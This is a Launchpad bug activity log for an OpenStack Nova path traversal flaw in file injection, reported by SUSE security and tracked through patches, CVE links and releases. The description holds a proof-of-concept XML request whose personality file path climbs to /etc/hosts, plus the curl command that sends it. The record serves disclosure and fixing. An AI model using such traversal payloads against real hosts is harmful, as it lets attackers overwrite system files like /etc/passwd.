2012-06-20 12:02:31 |
Thierry Carrez |
bug |
|
|
added bug |
2012-06-20 12:03:32 |
Thierry Carrez |
description |
Matthias Weckbecker from SUSE Security Team reported the following:
------------------
During our internal security audit efforts at SUSE for openstack, I have found
an issue in openstack-nova (compute).
Quoting from [1] (comment #1):
Vulnerable code (quoted), /usr/lib64/python2.6/site-packages/nova/utils.py:
[... snipped copy of utils.execute code ...]
It's already doing lots of things correctly, like e.g. calling Popen with
the first parameter being a list, still it is affected by traversal flaws.
Testcase (also from [1], comment #0):
mweckbecker@s3gfault:~$ cat newserver.xml
<?xml version="1.0" encoding="UTF-8"?>
<server xmlns="http://docs.openstack.org/compute/api/v1.1"
imageRef="http://anonymi.arch.suse.de:8774/985b88ae99474d6d90501870499a063f/images/2d583dfb-000a-4332-9264-ed57ce186f1d"
flavorRef="6"
name="new-server-test">
<metadata>
<meta key="My Server Name">foobar</meta>
</metadata>
<personality>
<file path="../../../../../../../../../../../../../etc/hosts">
ICAgICAgDQoiQSBjbG91ZCBkb2VzIG5vdCBrbm93IHdoeSBp
dCBtb3ZlcyBpbiBqdXN0IHN1Y2ggYSBkaXJlY3Rpb24gYW5k
IGF0IHN1Y2ggYSBzcGVlZC4uLkl0IGZlZWxzIGFuIGltcHVs
c2lvbi4uLnRoaXMgaXMgdGhlIHBsYWNlIHRvIGdvIG5vdy4g
QnV0IHRoZSBza3kga25vd3MgdGhlIHJlYXNvbnMgYW5kIHRo
ZSBwYXR0ZXJucyBiZWhpbmQgYWxsIGNsb3VkcywgYW5kIHlv
dSB3aWxsIGtub3csIHRvbywgd2hlbiB5b3UgbGlmdCB5b3Vy
c2VsZiBoaWdoIGVub3VnaCB0byBzZWUgYmV5b25kIGhvcml6
b25zLiINCg0KLVJpY2hhcmQgQmFjaA==
</file>
</personality>
</server>
mweckbecker@s3gfault:~$ curl -v \
"http://anonymi.arch.suse.de:8774/v2/985b88ae99474d6d90501870499a063f/servers" \
-H"X-Auth-Token:ef7d5faf9d864c048afce0cf6a3a3c15" \
-H"Content-type:application/xml" -H"Accept:application/xml" -d @newserver.xml
Additional note: This beast is calling tee with sudo, potentially allowing
attackers to even alter files such as /etc/passwd.
[1] https://bugzilla.novell.com/show_bug.cgi?id=767687
Thanks, Matthias |
|
2012-06-20 12:03:47 |
Thierry Carrez |
bug |
|
|
added subscriber Matthias Weckbecker |
2012-06-20 12:08:10 |
Thierry Carrez |
nova: importance |
Undecided |
Critical |
|
2012-06-20 12:08:10 |
Thierry Carrez |
nova: status |
New |
Confirmed |
|
2012-06-20 12:14:30 |
Thierry Carrez |
bug |
|
|
added subscriber Vish Ishaya |
2012-06-20 15:41:24 |
Russell Bryant |
nova: assignee |
|
Russell Bryant (russellb) |
|
2012-06-20 15:58:37 |
Russell Bryant |
attachment added |
|
0001-Prevent-file-injection-writing-to-host-filesystem.patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3197658/+files/0001-Prevent-file-injection-writing-to-host-filesystem.patch |
|
2012-06-20 15:58:50 |
Russell Bryant |
bug |
|
|
added subscriber Pádraig Brady |
2012-06-20 16:01:31 |
Russell Bryant |
attachment removed |
0001-Prevent-file-injection-writing-to-host-filesystem.patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3197658/+files/0001-Prevent-file-injection-writing-to-host-filesystem.patch |
|
|
2012-06-20 16:01:53 |
Russell Bryant |
attachment added |
|
0001-Prevent-file-injection-writing-to-host-filesystem.patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3197661/+files/0001-Prevent-file-injection-writing-to-host-filesystem.patch |
|
2012-06-20 16:11:20 |
Russell Bryant |
attachment removed |
0001-Prevent-file-injection-writing-to-host-filesystem.patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3197661/+files/0001-Prevent-file-injection-writing-to-host-filesystem.patch |
|
|
2012-06-20 16:12:24 |
Russell Bryant |
attachment added |
|
0001-Prevent-file-injection-writing-to-host-filesystem.patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3197663/+files/0001-Prevent-file-injection-writing-to-host-filesystem.patch |
|
2012-06-20 16:29:43 |
Russell Bryant |
attachment added |
|
0001-Prevent-file-injection-writing-to-host-filesystem-essex.patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3197686/+files/0001-Prevent-file-injection-writing-to-host-filesystem-essex.patch |
|
2012-06-20 16:29:52 |
Russell Bryant |
nominated for series |
|
nova/essex |
|
2012-06-20 19:30:08 |
Russell Bryant |
bug |
|
|
added subscriber Mark McLoughlin |
2012-06-21 07:03:17 |
Mark McLoughlin |
attachment added |
|
0001-Prevent-file-injection-writing-to-host-filesystem.patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3198461/+files/0001-Prevent-file-injection-writing-to-host-filesystem.patch |
|
2012-06-21 07:03:32 |
Mark McLoughlin |
bug task added |
|
nova/essex |
|
2012-06-21 08:09:05 |
Matthias Weckbecker |
bug |
|
|
added subscriber Thomas Biege |
2012-06-21 08:20:55 |
Thomas Biege |
bug |
|
|
added subscriber Christoph Thiel |
2012-06-21 09:04:44 |
Matthias Weckbecker |
bug |
|
|
added subscriber Ionuț Arțăriși |
2012-06-21 14:01:42 |
Russell Bryant |
attachment added |
|
0001-Prevent-file-injection-writing-to-host-filesystem.patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3198817/+files/0001-Prevent-file-injection-writing-to-host-filesystem.patch |
|
2012-06-21 14:01:58 |
Russell Bryant |
nova: assignee |
Russell Bryant (russellb) |
|
|
2012-06-21 14:02:03 |
Russell Bryant |
nova/essex: importance |
Undecided |
Critical |
|
2012-06-21 14:03:18 |
Russell Bryant |
nova/essex: status |
New |
Confirmed |
|
2012-06-21 14:03:38 |
Russell Bryant |
nominated for series |
|
nova/diablo |
|
2012-06-21 14:30:27 |
Thierry Carrez |
bug task added |
|
nova/diablo |
|
2012-06-21 14:30:35 |
Thierry Carrez |
nova/diablo: status |
New |
Confirmed |
|
2012-06-21 14:30:38 |
Thierry Carrez |
nova/diablo: importance |
Undecided |
High |
|
2012-06-25 09:42:43 |
Matthias Weckbecker |
bug |
|
|
added subscriber Sebastian Krahmer |
2012-06-25 10:09:13 |
Thierry Carrez |
attachment added |
|
Essex patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3203400/+files/essex.patch |
|
2012-06-25 11:57:39 |
Thierry Carrez |
attachment added |
|
Diablo patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3203516/+files/diablo.patch |
|
2012-06-25 12:48:29 |
Thierry Carrez |
attachment added |
|
diablo2.patch https://bugs.launchpad.net/nova/+bug/1015531/+attachment/3203587/+files/diablo2.patch |
|
2012-06-26 15:44:49 |
Thierry Carrez |
nova: assignee |
|
Thierry Carrez (ttx) |
|
2012-06-27 07:43:54 |
Thierry Carrez |
cve linked |
|
2012-3360 |
|
2012-06-27 07:44:11 |
Thierry Carrez |
cve linked |
|
2012-3361 |
|
2012-06-28 10:07:52 |
Thierry Carrez |
nova: status |
Confirmed |
Triaged |
|
2012-06-28 10:07:55 |
Thierry Carrez |
nova/diablo: status |
Confirmed |
Triaged |
|
2012-06-28 10:07:57 |
Thierry Carrez |
nova/essex: status |
Confirmed |
Triaged |
|
2012-07-03 10:16:42 |
Thierry Carrez |
bug |
|
|
added subscriber Dave Walker |
2012-07-03 16:05:59 |
Thierry Carrez |
visibility |
private |
public |
|
2012-07-03 16:06:05 |
Thierry Carrez |
nova: status |
Triaged |
Fix Committed |
|
2012-07-03 16:06:09 |
Thierry Carrez |
nova/diablo: status |
Triaged |
Fix Committed |
|
2012-07-03 16:06:14 |
Thierry Carrez |
nova/essex: status |
Triaged |
In Progress |
|
2012-07-03 16:06:19 |
Thierry Carrez |
nova/diablo: assignee |
|
Thierry Carrez (ttx) |
|
2012-07-03 16:06:22 |
Thierry Carrez |
nova/essex: assignee |
|
Thierry Carrez (ttx) |
|
2012-07-03 17:30:25 |
Steve Beattie |
bug |
|
|
added subscriber Steve Beattie |
2012-07-04 08:26:12 |
Thierry Carrez |
nova: status |
Fix Committed |
Fix Released |
|
2012-07-04 08:26:12 |
Thierry Carrez |
nova: milestone |
|
folsom-2 |
|
2012-07-05 09:51:55 |
Thierry Carrez |
removed subscriber OpenStack Vulnerability Management team |
|
|
|
2012-08-07 16:54:58 |
OpenStack Infra |
nova: status |
Fix Released |
In Progress |
|
2012-08-07 16:54:58 |
OpenStack Infra |
nova: assignee |
Thierry Carrez (ttx) |
Pádraig Brady (p-draigbrady) |
|
2012-08-07 17:04:49 |
OpenStack Infra |
nova/essex: assignee |
Thierry Carrez (ttx) |
Pádraig Brady (p-draigbrady) |
|
2012-08-07 18:53:22 |
Thierry Carrez |
nova: status |
In Progress |
Fix Released |
|
2012-08-07 18:53:41 |
Thierry Carrez |
nova/essex: status |
In Progress |
Fix Committed |
|
2012-08-07 22:56:21 |
Mark McLoughlin |
nova/essex: milestone |
|
2012.1.2 |
|
2012-08-10 06:03:27 |
Mark McLoughlin |
nova/essex: status |
Fix Committed |
Fix Released |
|
2012-08-24 09:22:19 |
Dave Walker |
nova (Ubuntu): status |
New |
Fix Released |
|
2012-08-24 09:22:22 |
Dave Walker |
nominated for series |
|
Ubuntu Precise |
|
2012-08-24 09:22:22 |
Dave Walker |
bug task added |
|
nova (Ubuntu Precise) |
|
2012-08-24 09:22:25 |
Dave Walker |
nova (Ubuntu Precise): status |
New |
Confirmed |
|
2012-08-24 09:51:36 |
Launchpad Janitor |
branch linked |
|
lp:~openstack-ubuntu-testing/nova/precise-essex-proposed |
|
2012-08-24 19:04:10 |
Jamie Strandboge |
cve linked |
|
2012-3447 |
|
2012-08-24 19:45:23 |
Launchpad Janitor |
branch linked |
|
lp:ubuntu/precise-proposed/nova |
|
2012-08-30 07:45:06 |
Adam Gandelman |
attachment added |
|
2012.1.3+stable-20120827-4d2a4afe-0ubuntu1.log https://bugs.launchpad.net/bugs/1015531/+attachment/3283238/+files/2012.1.3%2Bstable-20120827-4d2a4afe-0ubuntu1.log |
|
2012-08-30 07:45:08 |
Adam Gandelman |
tags |
|
verification-done |
|
2012-09-03 15:18:08 |
Launchpad Janitor |
nova (Ubuntu Precise): status |
Confirmed |
Fix Released |
|
2012-09-03 15:18:08 |
Launchpad Janitor |
cve linked |
|
2012-3371 |
|
2012-09-27 15:21:59 |
Thierry Carrez |
nova: milestone |
folsom-2 |
2012.2 |
|
2013-09-13 14:06:40 |
Thierry Carrez |
nova/diablo: assignee |
Thierry Carrez (ttx) |
|
|
2014-09-15 15:40:07 |
Sean Dague |
bug task deleted |
nova/diablo |
|
|